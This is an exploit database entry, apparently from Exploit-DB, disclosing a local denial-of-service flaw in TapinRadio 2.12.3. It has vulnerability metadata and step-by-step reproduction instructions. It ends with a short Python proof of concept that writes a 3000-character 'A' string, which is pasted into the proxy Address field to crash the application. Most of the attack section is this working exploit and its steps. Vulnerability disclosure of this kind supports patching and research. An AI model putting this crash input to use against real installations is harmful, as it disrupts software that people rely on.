TapinRadio 2.12.3 - 'address' Denial of Service (PoC)

vendor:

TapinRadio

by:

chuyreds

7.8

CVSS

HIGH

Denial of Service (DoS) Local

N/A

CWE

Product Name: TapinRadio

Affected Version From: 2.12.3

Affected Version To: 2.12.3

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10 Pro x64 es

2020

TapinRadio 2.12.3 – ‘address’ Denial of Service (PoC)

TapinRadio 2.12.3 is vulnerable to a denial of service attack when a maliciously crafted 'address' field is supplied. An attacker can exploit this vulnerability by running a python code to generate a maliciously crafted 'address' field, copying the content to clipboard, opening TapinRadio, selecting 'Settings' > 'Preferences' > 'Miscellaneous', selecting 'Set Application Proxy...', pasting the clipboard in the 'Address' field, typing '444' in the 'Port' field, typing 'test' in the 'Username' field, typing '1234' in the 'Password' field, selecting 'OK' and 'OK', which will cause the application to crash.

Mitigation:

N/A

Source

Exploit-DB raw data:

# Exploit Title: TapinRadio 2.12.3 - 'address' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-02-05
# Vendor Homepage: http://www.raimersoft.com/rarmaradio.html
# Software Link : http://www.raimersoft.com/downloads/tapinradio_setup_x64.exe
# Tested Version: 2.12.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

#Steps to produce the crash:
#1.- Run python code: tapinadio_address.py
#2.- Open tapin_add.txt and copy content to clipboard
#3.- Open TapinRadio
#4.- Select "Settings" > "Preferences" > "Miscellaneous"
#5.- Select "Set Application Proxy..."" In "Address" field paste Clipboard
#6.- In Port type "444" > "Username" type "test" > Password type "1234"
#7.- Select "OK" and "OK"
#8.- Crashed

cod = "\x41" * 3000
	
f = open('tapin_add.txt', 'w')
f.write(cod)
f.close()